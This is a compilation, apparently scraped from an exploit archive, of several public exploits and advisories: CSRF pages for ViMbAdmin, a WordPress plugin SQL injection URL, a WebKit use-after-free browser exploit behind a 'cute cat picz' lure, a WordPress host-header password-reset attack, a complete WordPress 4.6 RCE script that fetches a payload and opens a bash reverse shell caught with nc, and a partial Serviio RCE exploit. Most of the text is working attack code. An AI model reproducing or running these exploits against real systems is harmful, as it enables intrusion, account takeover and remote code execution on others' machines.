      startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
      startInfo.CreateNoWindow = true;
      startInfo.UseShellExecute = false;
      PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
      process.Start();
      process.WaitForExit();
   }
}


Proof of concept:

/Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
HireHackking 
# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15

## Product Description

ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions.

## Details

**CVE ID**: CVE-2017-6086

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-352

**CVSS Base Score**: 8.8

**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

## Proof of concept

### Add administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@email" >
<input type="text" name="password" value="newpassword" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>

```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Remove administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Change administrator password

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" >
<input type="text" name="password" value="newpassword" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Add mailbox address

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fakeemail>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="name" value="<fake name>" >
<input type="text" name="password" value="<password>" >
<input type="text" name="quota" value="0" >
<input type="text" name="alt_email" value="" >
<input type="text" name="cc_welcome_email" value="" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.

### Purge mailbox

#### Exploit

The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
<input type="text" name="data" value="purge" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.

### Archive mailbox

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/ArchiveController.php` file.

### Add alias address

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.

```html
curl 'http://<ip>/alias/add/did/<domain id>'  --data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>'
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fake mailbox>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="goto[]" value="<redirection email address>" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.

### Remove alias address

#### Exploit

The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable Code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.

## Affected version

* tested on version 3.0.15

## Timeline (dd/mm/yyyy)

* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs request for an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.


## Credits

* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)
HireHackking 
Source: http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

DefenseCode ThunderScan SAST Advisory

WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability
Advisory ID: DC-2017-02-011
Software: WordPress WebDorado Gallery Plugin
Software Language: PHP
Version: 1.3.29 and below
Vendor Status: Vendor contacted, vulnerability confirmed
Release Date: 20170502
Risk: Medium

1. General Overview
During the security audit, multiple security vulnerabilities were discovered in WordPress
WebDorado Gallery Plugin using DefenseCode ThunderScan application source code security
analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
According to the plugin developers, WebDorado, Gallery plugin is a fully responsive
WordPress gallery plugin with advanced functionality that is easy to customize and has
various views. It has more than 300,000 downloads on wordpress.org.
Homepage:
https://wordpress.org/plugins/photo-gallery/
https://web-dorado.com/products/wordpress-photo-gallery-plugin.html
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf


3. Vulnerability Description
During the security analysis, ThunderScan discovered SQL injection vulnerability in WebDorado
Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided
URL while being logged in as administrator or another user that is authorized to access the
plugin settings page. Any user with such privileges can obtain the valid bwg_nonce value by
previously visiting the settings page. Users that to do not have full administrative privileges
could abuse the database access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be able to.


3.1 SQL injection
Function: $wpdb->get_col($query)
Variable: $_GET['album_id']

Sample URL:
http://server/wp-admin/adminajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5))
)VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

File: photo-gallery\admin\models\BWGModelAddAlbumsGalleries.php

26 $album_id = ((isset($_GET['album_id'])) ? esc_html(stripslashes($_GET['album_id'])) :
((isset($_POST['album_id'])) ? esc_html(stripslashes($_POST['album_id'])) : ''));
...
28 $page_nav = $this->model->page_nav($album_id);

File: photo-gallery\admin\views\BWGViewAddAlbumsGalleries.php

41 public function page_nav($album_id) {
...
44 $query = "SELECT id FROM " . $wpdb->prefix . "bwg_album WHERE published=1 AND id<>" .
$album_id . " " . $where . " UNION ALL SELECT id FROM " . $wpdb->prefix . "bwg_gallery WHERE
published=1 " . $where;
45 $total = count($wpdb->get_col($query));


4. Solution
Vendor resolved the security issues in one of the subsequent releases. All users are strongly
advised to update WordPress WebDorado Gallery plugin to the latest available version. Version
1.3.38 no longer seems to be vulnerable.


5. Credits
Discovered by Neven Biruski with DefenseCode ThunderScan source code security analyzer.


6. Disclosure Timeline
20170404 Vendor contacted
20170405 Vendor responded: “Thanks for noticing and told us about this, we will
take into account and will fix the issues with upcoming update.”
? Update released
20170502 Latest plugin version tested. Vulnerability seems fixed.
Advisory released to the public.
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf


7. About DefenseCode
DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop
and mobile applications for security vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing)
solution for performing extensive security audits of application source code. ThunderScan
performs fast and accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing)
solution for comprehensive security audits of active web applications. WebScanner will test a
website's security by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
HireHackking 
Source: https://blogs.securiteam.com/index.php/archives/3171

Vulnerability Details

Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.

The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.

The first request starts a session for the bi-directional channel and is used for “downloading” data from the server. The HTTP header “Session” is the identifier for the channel. The HTTP header “Side” specifies the “downloading/uploading” direction.

The second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the “Session” HTTP header which is just a UUID.


Proof of Concept

In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.

The second step is to change python script jenkins_poc1.py:
- Adjust target url in URL variable
- Change file to open in line “FILE_SER = open(“jenkins_poc1.ser”, “rb”).read()” to your payload file.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip
HireHackking 
<!--
Sources: 
https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf
https://github.com/phoenhex/files/blob/master/exploits/cachedcall-uaf.html

Overview
The WebKit bug we used at Pwn2Own is CVE-2017-2491 / ZDI-17-231, a use-after-free of a JSString object in JavaScriptCore. By triggering it, we can obtain a dangling pointer to a JSString object in a JavaScript callback. At first, the specific scenario seems very hard to exploit, but we found a rather generic technique to still get a reliable read/write primitive out of it, although it requires a very large (~28 GiB) heap spray. This is possible even on a MacBook with 8 GB of RAM thanks to the page compression mechanism in macOS.

-->

<script>

function make_compiled_function() {
    function target(x) {
        return x*5 + x - x*x;
    }
    // Call only once so that function gets compiled with low level interpreter
    // but none of the optimizing JITs
    target(0);
    return target;
}

function pwn() {
    var haxs = new Array(0x100);
    for (var i = 0; i < 0x100; ++i)
        haxs[i] = new Uint8Array(0x100);

    // hax is surrounded by other Uint8Array instances. Thus *(&hax - 8) == 0x100,
    // which is the butterfly length if hax is later used as a butterfly for a
    // fake JSArray.
    var hax = haxs[0x80];
    var hax2 = haxs[0x81];

    var target_func = make_compiled_function();

    // Small helper to avoid allocations with .set(), so we don't mess up the heap
    function set(p, i, a,b,c,d,e,f,g,h) {
        p[i+0]=a; p[i+1]=b; p[i+2]=c; p[i+3]=d; p[i+4]=e; p[i+5]=f; p[i+6]=g; p[i+7]=h;
    }

    function spray() {
        var res = new Uint8Array(0x7ffff000);
        for (var i = 0; i < 0x7ffff000; i += 0x1000) {
            // Write heap pattern.
            // We only need a structure pointer every 128 bytes, but also some of
            // structure fields need to be != 0 and I can't remember which, so we just
            // write pointers everywhere.
            for (var j = 0; j < 0x1000; j += 8)
                set(res, i + j, 0x08, 0, 0, 0x50, 0x01, 0, 0, 0);

            // Write the offset to the beginning of each page so we know later
            // with which part we overlap.
            var j = i+1+2*8;
            set(res, j, j&0xff, (j>>8)&0xff, (j>>16)&0xff, (j>>24)&0xff, 0, 0, 0xff, 0xff);
        }
        return res;
    }

    // Spray ~14 GiB worth of array buffers with our pattern.
    var x = [
        spray(), spray(), spray(), spray(),
        spray(), spray(), spray(), spray(),
    ];

    // The butterfly of our fake object will point to 0x200000001. This will always
    // be inside the second sprayed buffer.
    var buf = x[1];

    // A big array to hold reference to objects we don't want to be freed.
    var ary = new Array(0x10000000);
    var cnt = 0;

    // Set up objects we need to trigger the bug.
    var n = 0x40000;
    var m = 10;
    var regex = new RegExp("(ab)".repeat(n), "g");
    var part = "ab".repeat(n);
    var s = (part + "|").repeat(m);

    // Set up some views to convert pointers to doubles
    var convert = new ArrayBuffer(0x20);
    var cu = new Uint8Array(convert);
    var cf = new Float64Array(convert);

    // Construct fake JSCell header
    set(cu, 0,
        0,0,0,0,  // structure ID
        8,        // indexing type
        0,0,0);   // some more stuff we don't care about

    var container = {
        // Inline object with indebufng type 8 and butterly pointing to hax.
        // Later we will refer to it as fakearray.
        jsCellHeader: cf[0],
        butterfly: hax,
    };

    while (1) {
        // Try to trigger bug
        s.replace(regex, function() {
            for (var i = 1; i < arguments.length-2; ++i) {
                if (typeof arguments[i] === 'string') {
                    // Root all the callback arguments to force GC at some point
                    ary[cnt++] = arguments[i];
                    continue;
                }
                var a = arguments[i];

                // a.butterfly points to 0x200000001, which is always
                // inside buf, but we are not sure what the exact
                // offset is within it so we read a marker value.
                var offset = a[2];

                // Compute addrof(container) + 16. We write to the fake array, then
                // read from a sprayed array buffer on the heap.
                a[2] = container;
                var addr = 0;
                for (var j = 7; j >= 0; --j)
                    addr = addr*0x100 + buf[offset + j];

                // Add 16 to get address of inline object
                addr += 16;

                // Do the inverse to get fakeobj(addr)
                for (var j = 0; j < 8; ++j) {
                    buf[offset + j] = addr & 0xff;
                    addr /= 0x100;
                }
                var fakearray = a[2];

                // Re-write the vector pointer of hax to point to hax2.
                fakearray[2] = hax2;

                // At this point hax.vector points to hax2, so we can write
                // the vector pointer of hax2 by writing to hax[16+{0..7}]

                // Leak address of JSFunction
                a[2] = target_func;
                addr = 0;
                for (var j = 7; j >= 0; --j)
                    addr = addr*0x100 + buf[offset + j];

                // Follow a bunch of pointers to RWX location containing the
                // function's compiled code
                addr += 3*8;
                for (var j = 0; j < 8; ++j) {
                    hax[16+j] = addr & 0xff;
                    addr /= 0x100;
                }
                addr = 0;
                for (var j = 7; j >= 0; --j)
                    addr = addr*0x100 + hax2[j];

                addr += 3*8;
                for (var j = 0; j < 8; ++j) {
                    hax[16+j] = addr & 0xff;
                    addr /= 0x100;
                }
                addr = 0;
                for (var j = 7; j >= 0; --j)
                    addr = addr*0x100 + hax2[j];

                addr += 4*8;
                for (var j = 0; j < 8; ++j) {
                    hax[16+j] = addr & 0xff;
                    addr /= 0x100;
                }
                addr = 0;
                for (var j = 7; j >= 0; --j)
                    addr = addr*0x100 + hax2[j];

                // Write shellcode
                for (var j = 0; j < 8; ++j) {
                    hax[16+j] = addr & 0xff;
                    addr /= 0x100;
                }
                hax2[0] = 0xcc;
                hax2[1] = 0xcc;
                hax2[2] = 0xcc;

                // Pwn.
                target_func();
            }
            return "x";
        });
    }
}
</script>

<button onclick="pwn()">click here for cute cat picz!</button>
HireHackking 
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================

Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------


Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:


------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------


As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.


The verification of the headers can be performed by replacing /usr/sbin/sendmail with a 
bash script of:

#!/bin/bash
cat > /tmp/outgoing-email
HireHackking 
#!/bin/bash
#
#      __                     __   __  __           __
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
#            /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
#                        .;lc'
#                    .,cdkkOOOko;.
#                 .,lxxkkkkOOOO000Ol'
#             .':oxxxxxkkkkOOOO0000KK0x:'
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
#             .':oxxxxxxxxx.ckkkkkkkkxl,.
#                 .,cdxxxxx.ckkkkkxc.
#                    .':odx.ckxl,.
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------



rev_host="192.168.57.1"

function prep_host_header() {
      cmd="$1"
      rce_cmd="\${run{$cmd}}";

      # replace / with ${substr{0}{1}{$spool_directory}}
      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

      # replace ' ' (space) with
      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      #return "target(any -froot@localhost -be $rce_cmd null)"
      host_header="target(any -froot@localhost -be $rce_cmd null)"
      return 0
}


#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro"  | base64 -d
echo "$intro2" | base64 -d

if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo


if [ "$choice" == "y" ]; then

echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"

# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!

# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"

echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0

fi


echo "Exiting..."
exit 0
HireHackking 
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows host is affected by
# an unauthenticated remote code execution vulnerability due to improper access control
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
# simple JSON request, gaining system access with SYSTEM privileges via a specially
# crafted request and escape sequence.
#
# =================================================================================
# org/serviio/ui/resources/server/ActionsServerResource.java:
# -----------------------------------------------------------
#
#    private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
#        this.validateParameters(representation, 2);
#        try {
#            MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
#            String url = StringUtils.trim(representation.getParameters().get(1));
#            LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
#            DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
#            FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
#            return this.responseOk();
#        }
#        catch (InvalidMediaFormatException e) {
#            return this.responseOk(603);
#        }
#
# =================================================================================
# serviio.jar / external / ProcessExecutor.java:
# ----------------------------------------------
#
#    private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
#        HashMap<String, String> newEnv = new HashMap<String, String>();
#        newEnv.putAll(System.getenv());
